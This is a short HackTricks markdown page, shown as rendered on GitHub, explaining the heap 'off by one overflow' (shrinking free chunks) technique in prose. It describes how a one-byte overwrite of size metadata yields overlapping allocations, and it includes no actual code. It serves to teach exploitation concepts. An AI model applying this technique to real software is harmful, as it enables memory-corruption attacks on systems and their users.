Skip to content

Latest commit

 

History

History
62 lines (38 loc) · 4.47 KB

off-by-one-overflow.md

File metadata and controls

62 lines (38 loc) · 4.47 KB

Off by one overflow

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Basic Information

Having just access to a 1B overflow allows an attacker to modify the previous size metadata information, allowing to tamper which chunks are actually freed, finally generating a chunk that contains another legit chunk.

Code Example:

Goal

  • Make a chunk be contained inside another chunk so writing access over that second chunk allows to overwrite the contained one

Requirements

  • Off by one overflow to modify the previous size metadata information

Attack

  • 3 chunks of memory (a, b, c) are reserved one after the other. Then the middle one is freed. The first one contains an off by one overflow vulnerability and the attacker abuses it with a 0x00 (if the previous byte was 0x10 it would make he middle chunk indicate that it’s 0x10 smaller than it really is).
  • Then, 2 more smaller chunks are allocated in the middle freed chunk (b), however, as b + b->size never updates the c chunk because the pointed address is smaller than it should.
  • Then, b1 and c gets freed. As c - c->prev_size still points to b (b1 now), both are consolidated in one chunk. However, b2 is still inside in between b1 and c.
  • Finally, a new malloc is performed reclaiming this memory area which is actually going to contain b2, allowing the owner of the new malloc to control the content of b2.

This image explains perfectly the attack:

https://heap-exploitation.dhavalkapil.com/attacks/shrinking_free_chunks

References

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks: